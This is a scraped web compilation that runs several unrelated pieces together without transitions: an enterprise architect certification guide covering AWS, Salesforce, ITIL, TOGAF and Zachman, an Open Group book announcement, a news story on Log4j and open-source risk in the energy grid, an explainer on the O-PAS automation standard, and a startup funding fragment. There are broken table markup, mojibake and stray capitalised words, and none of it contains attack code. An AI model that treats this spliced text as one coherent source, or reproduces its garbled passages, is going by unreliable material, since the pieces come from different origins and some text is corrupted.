Enterprise IT architect certifications appear most often at the apex of certification programs, where less than 1% of IT professionals ultimately ascend. Even so, many IT architect certifications are available, and you don’t need to invest in one certification sponsor’s vision to reach the top.
Many IT certifications in this area fall outside vendor umbrellas, which means they are vendor-neutral or vendor-agnostic. Nevertheless, the number of vendor-specific IT certifications exceeds vendor-neutral ones by a factor of more than 2 to 1. That’s why we devote the last section of this article to all such credentials, as we encountered them in search of the best enterprise architect certifications.
For IT pros who’ve already invested in vendor-specific certification programs, credentials at the architect level may indeed be worth pursuing. Enterprise architects are among the highest-paid employees and consultants in the tech industry.
Enterprise architects are technical experts who are able to analyze and assess organizational needs, make recommendations regarding technology changes, and design and implement those changes across the organization.
The national average salary per SimplyHired is $130,150, in a range from $91,400 to a whopping $185,330. Glassdoor reports $133,433 as the average. Ultimately, the value of any IT certification depends on how long the individual has worked and in what part of the IT patch.
Becoming an enterprise architect is not easy. While the requirements may vary by employer, most enterprise architects have a bachelor’s degree or higher in a computer-related field along with 5-10 years of professional work experience. Many enterprise architects obtain additional certifications past graduation.
Certifications are a great way to demonstrate to prospective employers that you have the experience and technical skills necessary to do the job and deliver you a competitive edge in the hiring process. Certification holders also frequently earn more than their uncertified counterparts, making certifications a valuable career-building tool.
Below, you’ll find our top five certification picks. Before you peruse our best picks, check out the results of our informal job board survey. Data indicates the number of job posts in which our featured certifications were mentioned on a given day. The data should deliver you an idea of the relative popularity of each of these certifications.
|AWS Certified Solution Architect (Amazon Web Services)||1,035||464||2,672||240||4,411|
|ITIL Master (Axelos)||641||848||1,218||1,119||3,826|
|TOGAF 9 (The Open Group)||443||730||271||358||1,802|
|Zachman Certified – Enterprise Architect (Zachman)||86||107||631||252||1,076|
Making its first appearance on the leaderboard is the Certified Solutions Architect credential from Amazon Web Services (AWS). AWS, an Amazon subsidiary, is the global leader in on-demand cloud computing. AWS offers numerous products and services to support its customers, including the popular Amazon Simple Storage Service (S3) and Amazon Elastic Compute Cloud (EC2). AWS also offers numerous cloud applications and developer tools, including Amazon Comprehend, Amazon SageMaker Batch Transform and Amazon Lightsail.
AWS offers certifications at the foundation, associate and professional levels across five role-based categories: architect, developer, operations, cloud and specialty certifications. Foundation-level certifications validate a candidate’s understanding of the AWS Cloud and serve as a prerequisite to AWS specialty certifications. Foundation certifications are a recommended starting place for those seeking higher-level credentials.
Associate credentials typically have no prerequisites and focus on technical skills. They are required to obtain professional-level certifications, which are the highest level of technical certification available. Specialty certs, meanwhile, focus on skills in targeted areas.
AWS currently offers the following credentials:
The AWS Certified Solutions Architect credential is available at the associate and professional levels. The associate credential targets candidates with at least one year of experience architecting and implementing solutions based on AWS applications and technologies. AWS updated the associate-level exam in February 2018 to include architecture best practices and new services.
The AWS Certified Solutions Architect – Professional certification targets senior AWS architects who can architect, design, implement and manage complex enterprise-level AWS solutions based on defined organizational requirements. Candidates should have a minimum of two years’ direct experience deploying and designing on the AWS cloud and be able to translate organizational requirements into solutions and recommend best practices. The associate credential is a mandatory prerequisite.
|Certification name||Certified Solution Architect – Associate
Certified Solution Architect – Professional
|Prerequisites and required courses||Associate: One year of hands-on experience recommended, AWS Certified Cloud Practitioner
Professional: Certified Solution Architect – Associate credential plus a minimum of two years of hands-on experience
|Number of exams||Associate: One exam (65 questions, 130 minutes to complete)
Professional: One exam (170 minutes to complete)
|Certification fees||Associate: $150 (practice exam $20)
Professional: $300 (practice exam $40)
|Self-study materials||AWS makes demo questions, practice exams, exam guides, whitepapers and more available on the certification home page.|
CTA: Certified Technical Architect
In 1999, Salesforce revolutionized the world of CRM when it introduced the concept of using the cloud to provide top-notch CRM software. Today, Salesforce has more than 150,000 customers, making it the industry leader for CRM enterprise cloud platforms. Currently, Salesforce offers solutions for various focus areas, including sales, service, marketing, commerce, engagement, community, productivity (Quip), platform and ecosystem, integration, analytics, enablement, internet of things (IoT), artificial intelligence, mobility, and industry (financial and health).
To meet industry needs for qualified and experienced professionals with the skills necessary to support its growing customer base, Salesforce developed and maintains a top-tier certification program. It offers many paths to candidates, including for administration, app building, architecture and marketing.
Salesforce Architect certifications are hierarchical, with most (but not all) lower-level credentials serving as prerequisites for more advanced credentials. At the top of the certification pyramid is the highest credential a Salesforce professional can earn – the Certified Technical Architect (CTA), which is our featured Salesforce certification.
The Salesforce Architect certification pyramid has three levels:
Salesforce requires CTAs to maintain current skills. Credential holders must pass maintenance module exams with each new product release cycle (typically in summer, winter and spring). While challenging to earn, the CTA is important for IT professionals who are serious about a Salesforce technologies career.
|Certification name||Certified Technical Architect (CTA)|
|Prerequisites and required courses||Salesforce Certified Application Architect and Salesforce Certified System Architect credential:
|Number of exams||One exam (four hours to complete; candidates must formulate, justify and present recommendations based on a hypothetical scenario to a review board)|
Retake fee: $3,000
|Self-study materials||Salesforce maintains links on the certification webpage to numerous review materials, including the online documentation, tip sheets, user guides, exam guide and outline, Architect Journey e-books, Trailhead trails, and the Salesforce Certification Guide.|
ITIL Master Certificate – IT Service Management
One of our favorite credential sets (and for employers as well, judging by job board numbers) is the ITIL for IT Service Management credentials from Axelos. Axelos is a global provider of standards designed to drive best practices and quality throughout organizations. ITIL (Information Technology Infrastructure Library) joined the Axelos family in 2013.
Axelos manages ITIL credentialing requirements and updates, provides accreditation to Examination Institutes (EIs), and licenses organizations seeking to use ITIL. In addition to ITIL certifications, Axelos offers credentials for Prince2 2017 (which includes Foundation, Practitioner and Agile qualifications), Prince2 Agile, Resilia, MSP, MoP, M_o_R, P30, MoV, P3M3 and AgileSHIFT.
ITIL is a set of well-defined and well-respected best practices that specifically target the area of IT service management. There are more than 2 million ITIL-certified practitioners worldwide. ITIL is perhaps the most widely known and globally adopted set of best practices and management tools for IT service management and support.
Axelos maintains a robust ITIL certification portfolio consisting of five ITIL credentials:
Axelos introduced ITIL 4 in early 2019. ITIL 3 practitioners should check the Axelos website frequently for updates about the transition to ITIL 4 and availability of the ITIL 4 transition modules.
The ITIL Master is the pinnacle ITIL certification, requiring experience, dedication, and a thorough understanding of ITIL principles, practices, and techniques. To gain the ITIL Master designation, candidates must have at least five years of managerial, advisory or other leadership experience in the field of IT service management. They must also possess the ITIL Expert certification. Once the skill and certification requirements are met, the real certification work begins.
Upon completing the prerequisites, candidates must register with PeopleCert, the sole approved Axelos Examination Institute, and submit an application. Next, candidates prepare and submit a proposal for a business improvement to implement within their organization. The proposal submission is followed by a “work package,” which documents a real-world project that encompasses multiple ITIL areas.
The work package (1) validates how the candidate applied ITIL principles, practices, and techniques to the project; and (2) documents the effectiveness of the solution and the ultimate benefit the business received as a result of the ITIL solution. Finally, candidates must pass an interview with an assessment panel where they defend their solution.
Axelos will soon be sponsoring 50 lucky people in their quest to obtain the ITIL 4 Master certification. You can register your interest in the program here.
|Certification name||ITIL Master Certificate – IT Service Management|
|Prerequisites and required courses||ITIL Expert Certificate: Five years of IT service experience in managerial, leadership or advisory roles|
|Number of exams||No exam required, but candidates must complete the following steps:
|Certification fees||$4,440 if all ITIL credits obtained through PeopleCert
$5,225 if some ITIL credits were obtained from other institutes
|Self-study materials||Axelos provides documentation to guide candidates in the preparation of proposal and work package submissions. Available documents include ITIL Master FAQs, ITIL Master Proposal Requirements and Scope, and ITIL Master Work Package Requirements and Scope.|
A leader in enterprise architecture, The Open Group’s standards and certifications are globally recognized. The TOGAF (The Open Group Architecture Framework) standard for enterprise architecture is popular among leading enterprise-level organizations. Currently, TOGAF is the development and architecture framework of choice for more than 80% of global enterprises.
TOGAF’s popularity reflects that the framework standard is specifically geared to all aspects of enterprise-level IT architectures, with an emphasis on building efficiency within an organization. The scope of the standard’s approach covers everything from design and planning stages to implementation, maintenance, and governance.
The Open Group offers several enterprise architect credentials, including TOGAF, Open CA, ArchiMate, IT4IT and the foundational Certified Technical Specialist (Open CTS).
The Open Group reports that there are more than 75,000 TOGAF-certified enterprise architects. At present, there are two TOGAF credentials: the TOGAF 9 Foundation (Level 1) and TOGAF 9 Certified (Level 2). (The TOGAF framework is currently based on version 9.2, although the credential name still reflects version 9.)
The TOGAF 9 Foundation, or Level 1, credential targets architects who demonstrate an understanding of TOGAF principles and standards. A single exam is required to earn the Level 1 designation. The Level 1 exam focuses on TOGAF-related concepts such as TOGAF reference models, terminology, core concepts, standards, ADM, architectural governance and enterprise architecture. The Level 1 credential serves as a steppingstone to the more advanced TOGAF Level 2 certification.
The TOGAF 9 Certified, or Level 2, credential incorporates all requirements for Level 1. Level 2 TOGAF architects possess in-depth knowledge of TOGAF standards and principles and can apply them to organizational goals and enterprise-level infrastructure. To earn this designation, candidates must first earn the Level 1 credential and pass the Level 2 exam. The Level 2 exam covers TOGAF concepts such as ADM phases, governance, content framework, building blocks, stakeholder management, metamodels, TOGAF techniques, reference models and ADM iterations.
Candidates wanting a fast track to Level 2 certification may take a combination exam, which covers requirements for both Level 1 and 2. Training is not mandatory for either credential but is highly recommended. Training classes run 2-5 days, depending on the provider and whether you’re taking the combined or single-level course. The Open Group maintains a list of approved training providers and a schedule of current training opportunities on the certification webpage.
|Certification name||TOGAF 9 Foundation (Level 1)
TOGAF 9 Certified (Level 2)
|Prerequisites and required courses||TOGAF 9 Foundation (Level 1): None
TOGAF 9 Certified (Level 2): TOGAF 9 Foundation (Level 1) credential
|Number of exams||Level 1: One exam (40 questions, 60 minutes, 55% required to pass)
Level 2: One exam (eight questions, 90 minutes)
Level 1 and 2 combined exam (48 questions, 2.5 hours)
|Certification fees||$320 each for Level 1 and Level 2 exams
$495 for combined Level 1 and Level 2 exam
Exams are administered by Pearson VUE. Some training providers include the exam with the training course.
|Self-study materials||A number of resources are available from The Open Group, including whitepapers, webinars, publications, TOGAF standards, the TOGAF Foundation Study Guide ($29.95 for PDF; includes practice exam), practice questions (99 cents for PDF) and the TOGAF 9 Certified Study Guide (a combined study guide is available for $59.95). The Open Group also maintains a list of accredited training course providers and a calendar of training events.|
Zachman Certified – Enterprise Architect
Founded in 1990, Zachman International promotes education and research for enterprise architecture and the Zachman Framework. Rather than being a traditional process or methodology, the Zachman Framework is more accurately referred to as an “ontology.” Ontologies differ from a traditional methodology or process in that, rather than focusing on the process or implementation, they focus on the properties, types and interrelationships of entities that exist within a particular domain. The Zachman Framework ontology focuses on the structure, or definition, of the object and the enterprise. Developed by John Zachman, this framework sets a standard for enterprise architecture ontology.
Zachman International currently offers four enterprise architect credentials:
Zachman credentials are valid for three years. To maintain these credentials, candidates must earn continuing education credits (referred to as EADUs). The total number of EADUs required varies by certification level.
|Certification name||Enterprise Architect Associate Certification (Level 1)
Enterprise Architect Practitioner Certification (Level 2)
Enterprise Architect Professional Certification (Level 3)
Enterprise Architect Educator Certification (Level 4)
|Prerequisites and required courses||Level 1 Associate: Four-day Modeling Workshop ($3,499)
Level 2 Practitioner: None
Level 3 Professional: None
Level 4 Educator: Review all materials related to The Zachman Framework; Level 3 Professional recommended
|Number of exams||Level 1 Associate: One exam
Level 2 Practitioner: No exam; case studies and referee review required
Level 3 Professional: No exam; case studies and referee review required
Level 4 Educator: None; must develop and submit curriculum and course materials for review and validation
|Certification fees||Level 1 Associate: exam fee included as part of required course
Level 2 Practitioner: None, included as part of Level 1 required course
Level 3 Professional: Not available
Level 4 Educator: Not available
|Self-study materials||Live classroom and distance learning opportunities are available. Zachman also offers webcasts, a glossary, the Zachman Framework for Enterprise Architecture and reference articles.|
Beyond the top 5: More enterprise architect certifications
The Red Hat Certified Architect (RHCA) is a great credential, especially for professionals working with Red Hat Enterprise Linux.
The Project Management Professional (PMP) certification from PMI continues to appear in many enterprise architect job descriptions. Although the PMP is not an enterprise architect certification per se, many employers look for this particular combination of skills.
Outside of our top five vendor-neutral enterprise architect certifications (which focus on more general, heterogeneous views of IT systems and solutions), there are plenty of architect-level certifications from a broad range of vendors and sponsors, most of which are vendor-specific.
The table below identifies those vendors and sponsors, names their architect-level credentials, and provides links to more information on those offerings. Choosing one or more of these certifications for research and possible pursuit will depend on where you work or where you’d like to work.
<td”>EMC Cloud Architect Expert (EMCCAe) <td”>GoCertify </td”></td”>
|Sponsor||Enterprise architect certification||More information|
|BCS||BCS Practitioner Certificate in Enterprise and Solutions Architecture||BCS homepage|
|Cisco||Cisco Certified Architect (CCAr)||CCAr homepage|
|Enterprise Architecture Center of Excellence (EACOE)||EACOE Enterprise Architect
EACOE Senior Enterprise Architect
EACOE Distinguished Enterprise Architect EACOE Enterprise Architect Fellow
|EACOE Architect homepage|
|FEAC Institute||Certified Enterprise Architect (CEA) Black Belt
Associate Certified Enterprise Architect (ACEA) Green Belt
|FEAC CEA homepage|
|Hitachi Vantara||Hitachi Architect (three tracks: Infrastructure, Data Protection, and Pentaho Solutions)
Hitachi Architect Specialist (two tracks: Infrastructure and Converged)
|Training & Certification homepage|
|IASA||Certified IT Architect – Foundation (CITA-F)
Certified IT Architect – Associate (CITA-A)
Certified IT Architect – Specialist (CITA-S)
Certified IT Architect – Professional (CITA-P)
|National Instruments||Certified LabVIEW Architect (CLA)||CLA homepage|
|Nokia||Nokia Service Routing Architect (SRA)||SRA homepage|
|Oracle||Oracle Certified Master, Java EE Enterprise Architect Certified Master||Java EE homepage|
|Red Hat||Red Hat Certified Architect (RHCA)||RHCA homepage|
|SOA (Arcitura)||Certified SOA Architect||SOA Architect homepage|
These architect credentials typically represent pinnacle certifications within the programs to which they belong, functioning as high-value capstones to those programs in many cases. The group of individuals who attain such credentials is often quite small but comes with tight sponsor relationships, high levels of sponsor support and information delivery, and stratospheric salaries and professional kudos.
Often, such certifications provide deliberately difficult and challenging targets for a small, highly select group of IT professionals. Earning one or more of these certifications is generally the culmination of a decade or more of professional growth, high levels of effort, and considerable expense. No wonder, then, that architect certifications are highly regarded by IT pros and highly valued by their employers.
Enterprise architect credentials will often be dictated by choices that your employer (or industry sector, in the case of government or DoD-related work environments) have already made independent of your own efforts. Likewise, most of the vendor-specific architecture credentials make sense based on what’s deployed in your work environment or in a job you’d like to occupy.
Though there are lots of potential choices IT pros could make, the real number they can or should make will be influenced by their circumstances.
The Open Group today announced the immediate availability of its new book, Cloud Computing for Business, which takes an in-depth look at Cloud Computing and how enterprises can derive the greatest business benefit from its potential. The publication is part of the ongoing work of The Open Group Cloud Computing Work Group, which exists to create, among buyers and suppliers, a common understanding of how enterprises of all sizes and scales of operation can use Cloud Computing technology in a safe and secure way in their architectures to realize its significant cost, scalability and agility benefits.
Intended for a variety of corporate stakeholders — from the executive suite to business managers, the IT and marketing departments, as well as enterprise and business architects —the book reflects the combined experience of member companies of The Open Group and their collective understanding shared with the wider IT community as practical guidance for considering Cloud Computing. The book explores the importance of Cloud Computing within the overall technology landscape and provides practical advice for companies considering using the Cloud, as well as ways to assess the risk in Cloud initiatives and build return on investment.
“With each new technology trend that emerges, the resulting hype cycle often obscures how companies can actually take advantage of the new phenomenon and share in its growth and benefits,” said Dr. Chris Harding, Director, Interoperability, The Open Group. “The Cloud Computing Work Group was established by Open Group members to help enterprises of all sizes make sense of Cloud Computing and provide the understanding necessary to make it work for them. The Open Group and our member community are excited to release this book, which pays special consideration to an organization’s technical and business requirements, and aims to help readers gain the greatest value possible from their Cloud projects.”
Key themes covered in the book include:
• Why Cloud?
• Establishing Your Cloud Vision
• Buying Cloud Services
• Understanding Cloud Risk
• Building Return on Investment from Cloud Computing
• Cloud Challenges for the Business
Cloud Computing for Business is available for download from The Open Group at https://www2.opengroup.org/ogsys/jsp/publications/PublicationDetails.jsp?publicationid=12431 and as a hard copy from Van Haren Publishing at http://www.vanharen-library.net/cloudcomputingforbusinesstheopengroupguide-p994.html. The hardcopy version retails for $58 in the U.S., £37 in the United Kingdom and for €39.95 in Europe.
TYSONS CORNER, VA, April 26, 2018 â€” Andras Szakal, vice president and chief technology officer of the U.S. federal business at IBM (NYSE: IBM), has received recognition from The Open Group industry consortium for his contribution to drive innovation through open technology standards, ExecutiveBiz reported Tuesday. The organization ...
The worst computer vulnerability in accurate years was in a ubiquitous piece of open-source software — a bug that was as simple to exploit as it was difficult to patch.
The Apache Log4j security flaw opened the door to millions of computers, but the extent of the damage still isn’t fully understood. Nearly a year later, federal officials and Congress are still discussing how to avoid another potential disaster.
Open source, which is code that is “open” to everyone to use or edit, can be found in nearly every type of modern technology. It has served as the backbone of the internet, and is pervasive throughout the economy — including in the energy sector.
That makes it a looming issue for energy cybersecurity.
“Of course, [the Energy Department] is concerned about open-source software,” said Cheri Caddy, a former senior adviser at DOE who is currently director of cyber policy and plans at the Office of the National Cyber Director. “Open-source software is a part of all software development, whether it’s [operational technology] or IT. It’s just ubiquitous in everything now.”
The Log4j security lapse highlighted some of the key concerns: The development team was small, the software was found in nearly every industry, and many companies were unsure if they even had the code in their products.
The problem, experts say, is not that open source is inherently less secure than proprietary software. It’s not. But a few lines of code can be adopted throughout an entire industry.
When those few lines contain a serious vulnerability, that can be a problem for critical infrastructure, including the grid. It can become an open door that allows malicious hackers to walk into critical systems — especially when utilities aren’t aware that the door even exists.
In the energy sector, open-source software is everywhere, said Virginia Wright, an energy cybersecurity portfolio program manager at Idaho National Laboratory (INL).
Wright manages a DOE grid vulnerability testing bed called Cyber Testing for Resilient Industrial Control Systems (CyTRICS). The program, run by six DOE labs and led by INL, ferrets out vulnerabilities in the software that runs the power grid.
“One hundred percent of the systems that we have looked at have contained open-source software,” Wright said.
CyTRICS works on a voluntary basis with some of the biggest grid equipment manufacturers, like Hitachi Energy and Schweitzer Engineering Laboratories. Once a vulnerability is found, the lab reaches out to the manufacturers with potential mitigation measures to help patch the bug.
Sometimes that includes publicly known vulnerabilities. Because open-source software is freely available and widely used, vendors may not be aware that a vulnerability and patch even exist, Wright said.
Wright said that the labs have seen grid equipment vendors selling older versions of their products with known vulnerabilities and fixes. Some of that software is even updated in those vendors’ own systems, and their customers are “buying it with all of the vulnerabilities attached,” Wright said.
To avoid software with vulnerabilities, utilities “need to employ a pretty rigorous evaluation and testing process on their own,” she said.
The bipartisan infrastructure bill codifies and places the CyTRICS program under the Cyber Sense program. By September of next year, DOE aims to analyze around 10 percent of critical components in energy systems and expand the program’s voluntary partnerships to cover around 15 percent of market share, according to DOE’s two-year performance goal.
DOE also launched a pilot program for an energy-focused “software bill of materials,” which is similar to the food industry’s ingredient label. Such a label, experts say, can increase visibility into the software that runs critical infrastructure.
Congress also has begun to take further action. Sens. Gary Peters (D-Mich.) and Rob Portman (R-Ohio) — the chair and ranking member, respectively, of the Senate Homeland Security and Governmental Affairs Committee — have moved forward legislation that would direct the Cybersecurity and Infrastructure Security Agency to study ways to mitigate risks in critical infrastructure that uses open-source software.
The transparency of open-source software means that malicious hackers can look at the source code to find new vulnerabilities, said Keith Lunden, manager of cyber physical threat analysis at cybersecurity firm Mandiant.
However, it’s a two-way street. Cybersecurity researchers have the same access, so they can identify and fix those vulnerabilities before malicious hackers have a chance to exploit them, Lunden said.
And unlike proprietary software, open-source software doesn’t have a shelf life. Vendors will eventually stop supporting a software product; the same isn’t true for open-source. For industrial systems that are designed to operate for decades, that longevity is key.
“With open-source software, the community has access to the source, and they can independently develop patches indefinitely, which can be an important factor for OT security,” Lunden said.
At least that’s the idea.
The flexibility of open source can mean that it’s constantly branching into new code: Individuals and companies may adapt it for their use, potentially creating new vulnerabilities.
Thomas Pace, co-founder of cybersecurity firm NetRise and a former DOE contractor in industrial control security, said he knows of a major telecommunications vendor that will take open-source software and rewrite portions of the code.
“That just then introduces a different set of problems, right? Because now you have to maintain your own code versus the whole community maintaining the code,” he said. “Is that better, is that worse? That’s a debate.”
An open-source bug can also mean widespread risk. In 2014, hackers took advantage of a massive vulnerability in an open-source encryption program called OpenSSL.
But the incident, called Heartbleed, was a single vulnerability. Once the bug is fixed, the onus is on vendors and owners to patch their system. If, instead, each software vendor created their own version of OpenSSL, there would be multiple vulnerabilities in each version.
“So it’s about a trade-off,” said Wright.
The discovery of the Log4j vulnerability prompted the White House to hold an open-source software security summit last January. The meeting — which included top U.S. cyber experts, agency officials and open-source leaders like the Linux Foundation — aimed to Strengthen federal and private collaboration so the software would be more secure.
In the months since, the Cybersecurity and Infrastructure Security Agency has promoted the use of a software bill of materials as a step to secure open-source software. CISA also plans to work with the open-source security community to identify commonly used code in critical infrastructure, in an effort to better understand where collaboration can take place.
But the agency highlighted that it can be a challenge to work with an open-source community when, by definition, it’s open to anyone. While there are some foundations that promote open-source development, software is often developed by small teams or single individuals.
In the meantime, CISA, the National Security Agency and Office of the Director of National Intelligence released best practices for open source developers to better secure their code.
As for the Log4j vulnerability, “significant risk remains,” according to a report this year from the Department of Homeland Security’s Cyber Safety Review Board.
The board, created by executive order in 2021, found that systems using the vulnerable Log4j version would be a major issue for “perhaps a decade or longer.”
The report concludes that the vulnerability did not lead to significant cyberattacks to critical infrastructure.
But NetRise’s Pace called that an “impossible statement,” and even the report notes that it’s not so cut-and-dried.
“While cybersecurity vendors were able to provide some anecdotal evidence of exploitation, no authoritative source exists to understand exploitation trends across geographies, industries, or ecosystems. Many organizations do not even collect information on specific Log4j exploitation, and reporting is still largely voluntary,” the board wrote in the report.
In short, organizations themselves sometimes aren’t aware that they have been targeted by malicious hackers. There is no list of where the Log4j software is installed.
The report also highlights the “security risks unique to the thinly-resourced, volunteer-based open source community.” It calls for centralized resources to help developers ensure their code is created to the latest security standards.
“Just as the software industry has enabled the democratization of software programming — the ability for anyone to generate software with little or no formal training — we must also democratize security by banking security by default into the platforms used to generate, build, deploy, and manage software at scale,” the report concludes.
A detailed look at O-PAS™ Standard, Version 1.0
By Dave Emerson
Process automation end users and suppliers have expressed interest in a standard that will make the industry much more open and modular. In response, the Open Process Automation™ Forum (OPAF) has worked diligently at this task since November 2016 to develop process automation standards. The scope of the initiative is wide-reaching, as it aims to address the issues associated with the process automation systems found in most industrial automation plants and facilities today (figure 1).
It is easy to see why a variety of end users and suppliers are involved in the project, because the following systems are affected:
In June 2018, OPAF released a technical reference model (TRM) snapshot as industry guidance of the technical direction being taken for the development of this new standard. The organization followed the TRM snapshot with the release of the OPAS™ Version 1.0 in January 2019. Version 1.0 addresses the interoperability of components in federated process automation systems. This is a first stop along a three-year road map with annual releases targeting the themes listed in table 1.
Table 1. The O-PAS Standard three-year release road map addresses progressively more detailed themes.
By publishing versions of the standard annually, OPAF intends to make its work available to industry expeditiously. This will allow suppliers to start building products and returning feedback on technical issues, and this feedback-along with end user input-will steer OPAS development. O-PAS Version 1.0 was released as a preliminary standard of The Open Group to allow time for industry feedback.
The OPAF interoperability workshop in May 2019 is expected to produce feedback to help finalize the standard. The workshop allows member organizations to bring hardware and software that support O-PAS Version 1.0, testing it to verify the correctness and clarity of this preliminary standard. The results will not be published but will be used to update and finalize the standard.
Figure 1. A broad sampling of suppliers and end users are highly interested in the scope of the OPAS under development by OPAF, because it touches on all the key components of industrial automation systems: hardware (I/O), the communication network, system software (e.g., run time, namespace), application software, and the data model.
For clarity, a summary of the terminology associated with the OPAF initiative is:
Creating a "standard of standards" for open, interoperable, and secure automation is a complex undertaking. OPAF intends to speed up the process by leveraging the valuable work of various groups in a confederated manner.
The OPAS Standard will reference existing and applicable standards where possible. Where gaps are identified, OPAF will work with associated organizations to update the underlying standard or add OPAS requirements to achieve proper definition. Therefore, OPAF has already established liaison agreements with the following organizations:
Additionally, OPAF is in discussions with AutomationML and the ISA Security Compliance Institute (ISCI) as an ISA/IEC 62443 validation authority. In addition to these groups, the OPC Foundation has joined OPAF as a member, so no liaison agreement is required.
As an example of this cooperation in practice, OPAS Version 1.0 was created with significant input from three existing standards, including:
Configuration portability, now under development for OPAS Version 2.0, will address the requirement to move control strategies among different automation components and systems. This has been identified by end users as a requirement to allow their intellectual property (IP), in the form of control strategies, to be portable. Existing standards under evaluation for use in Version 2.0 include:
O-PAS Version 3.0 will address application portability, which is the ability to take applications purchased from software suppliers and move them among systems within a company in accordance with applicable licenses. This release will also include the first specifications for hardware interfaces.
The five parts that make up O-PAS Version 1.0 are listed below with a brief summary of how compliance will be Checked (if applicable):
Part 1 - Technical Architecture Overview (informative) describes an OPAS-conformant system through a set of interfaces to the components. Read this section to understand the technical approach OPAF is following to create the O-PAS.
Part 2 - Security (informative) addresses the necessary cybersecurity functionality of components that are conformant to OPAS. It is important to point out that security is built into the standard and permeates it, as opposed to being bolted on as an afterthought. This part of the standard is an explanation of the security principles and guidelines that are built into the interfaces. More specific security requirements are detailed in normative parts of the standards. The detailed normative interface specifications are defined in Parts 3, 4, and 5. These parts also contain the associated conformance criteria.
Part 3 - Profiles defines sets of hardware and software interfaces for which OPAF will develop conformance tests to make sure products interoperate properly. The O-PAS Version 1 profiles are:
The term "Level" in the profile names refers to profile levels.
Part 4 - Connectivity Framework (OCF) forms the interoperable core of the system. The OCF is more than just a network, it is the underlying structure allowing disparate components to interoperate as a system. The OCF will use OPC UA for OPAS Versions 1.0, 2.0, and 3.0.
Part 5 - System Management covers foundational functionality and interface standards to allow the management and monitoring of components using a common interface. This part will address hardware, operating systems and platform software, applications, and networks-although at this point Version 1.0 only addresses hardware management.
Conformance criteria are identified by the verb "shall" within the O-PAS text. An OPAF committee is working on a conformance guide document that will be published later this year, which explains the conformance program and requirements for suppliers to obtain a certification of conformance.
The OPAS Standard supports communication interactions that are required within a service-oriented architecture (SOA) for automation systems by outlining the specific interfaces the hardware and software components will use. These components will be used to architect, build, and start up automation systems for end users.
The vision for the OPAS Standard is to allow the interfaces to be used in an unlimited number of architectures, thereby enabling each process automation system to be "fit for purpose" to meet specific objectives. The standard will not define a system architecture, but it will use examples to illustrate how the component-level interfaces are intended to be used. System architectures (figure 2) contain the following elements:
Distributed control node (DCN): A DCN is expected to be a microprocessor-based controller, I/O, or gateway device that can handle inputs and outputs and computing functions. A key feature of O-PAS is that hardware and control software are decoupled. So, the exact function of any single DCN is up to the system architect. A DCN consists of hardware and some system software that enables the DCN to communicate on the O-PAS network, called the OCF, and also allows it to run control software.
Distributed control platform (DCP): A DCP is the hardware and standard software interfaces required in all DCNs. The standard software interfaces are a common platform on top of which control software programs run. This provides the physical infrastructure and interchangeability capability so end users can control software and hardware from multiple suppliers.
Distributed control framework (DCF): A DCF is the standard set of software interfaces that provides an environment for executing applications, such as control software. The DCF is a layer on top of the DCP that provides applications with a consistent set of O-PAS related functions no matter which DCN they run in. This is important for creating an efficient marketplace for O-PAS applications.
OPAS connectivity framework (OCF): The OCF is a royalty-free, secure, and interoperable communication framework specification. In O-PAS Version 1, the OCF uses OPC UA.
Advanced computing platform (ACP): An ACP is a computing platform that implements DCN functionality but has scalable computing resources (memory, disk, CPU cores) to handle applications or services that require more resources than are typically available on a small profile DCP. ACPs may also be used for applications that cannot be easily or efficiently distributed. ACPs are envisioned to be installed within on-premise servers or clouds.
Within the OPAS Standard, DCNs represent a fundamental computing building block (figure 3). They may be hardware or virtual (when virtual they are shown as a DCF as in figure 2), big or small, with no I/O or various amounts. At the moment, allowable I/O density per DCN is not settled, so some standardization in conjunction with the market may drive the final configuration.
DCNs also act as a gateway to other networks or systems, such as legacy systems, wireless gateways, digital field networks, I/O, and controllers like DCS or PLC systems. Industrial Internet of Things (IIoT) devices can also be accessed via any of these systems.
Figure 2. OPAS establishes a system architecture organizing process automation elements into interoperable groupings.
End users today must work with and integrate multiple systems in most every process plant or facility. Therefore, the OPAS Standard was designed so users can construct systems from components and subsystems supplied by multiple vendors, without requiring custom integration. With the OPAS Standard it becomes feasible to assimilate multiple systems, enabling them to work together as one OPAS-compliant whole. This reduces work on capital projects and during the lifetime of the facility or plant, leading to a lower total cost of ownership.
By decoupling hardware and software and employing an SOA, the necessary software functions can be situated in many different locations or processors. Not only can software applications run in all hardware, but they can also access any I/O to increase flexibility when designing a system.
One set of components can be used to create many different systems using centralized architectures, distributed architectures, or a hybrid of the two. System sizes may range from small to large and can include best-in-class elements of DCS, PLC, SCADA, and IIoT systems and devices as needed.
Information technology (IT) can also be incorporated deeper into industrial automation operational technology (OT). For example, DMTF Redfish is an IT technology for securely managing data center platforms. OPAF is adopting this technology to meet OPAS system management requirements.
Each industrial automation supplier offers a variety of devices and systems, most of which are proprietary and incompatible with similar products from other vendors and sometimes with earlier versions of their own products. End users and system integrators trying to integrate automation systems of varying vintages from different suppliers therefore have a challenging job.
To address these issues, OPAF is making great strides toward assembling a comprehensive, open process automation standard. Partially built on other established industry standards, and extending to incorporate most aspects of industrial automation, the O-PAS Standard will greatly Strengthen interoperability among industrial automation systems and components. This will lower implementation and support costs for end users, while allowing vendors to innovate around an open standard.
For more information on OPAS Version 1.0, please download the standard at https://publications.opengroup.org/p190. Submit feedback by emailing email@example.com.
Figure 3. DCNs are conceived as modular elements containing DCP (hardware) and DCF (software), both of which are used to interface field devices to the OCF.
We want to hear from you! Please send us your comments and questions about this course to InTechmagazine@isa.org.
Rather than manually checking if your Open Office needs to update, you can configure your Open Office suite to download available updates automatically.
Did you miss a session from MetaBeat 2022? Head over to the on-demand library for all of our featured sessions here.
When it comes to creating applications, most developers have a secret weapon to innovate at pace: open-source software. Research shows that open-source libraries and components make up more than 75% of the code in the average software application, with the average software application depending on more than 500 components.
While these open-source dependencies are convenient, they also present new vulnerabilities that threat actors can exploit. For instance, injecting malware into a popular open-source project has the potential to affect thousands of downstream users.
In an attempt to increase enterprise visibility over open-source software components, today Endor Labs came out of stealth with a Dependency Lifecycle Management Platform and $25 million in seed funding.
The new solution provides developers with a tool to evaluate, maintain and update dependencies used for the environment.
Join today’s leading executives at the Low-Code/No-Code Summit virtually on November 9. Register for your free pass today.
The announcement comes as more and more organizations are committing to securing the software supply chain following President Biden’s Executive Order On Improving the Nation’s Cybersecurity.
The order called for software vendors selling solutions to the government to maintain a software bill of materials (SBOM) and automated vulnerability scanning. Fundamentally, the order recognized that the spiraling complexity of open-source components needed to be addressed to get the threat landscape under control.
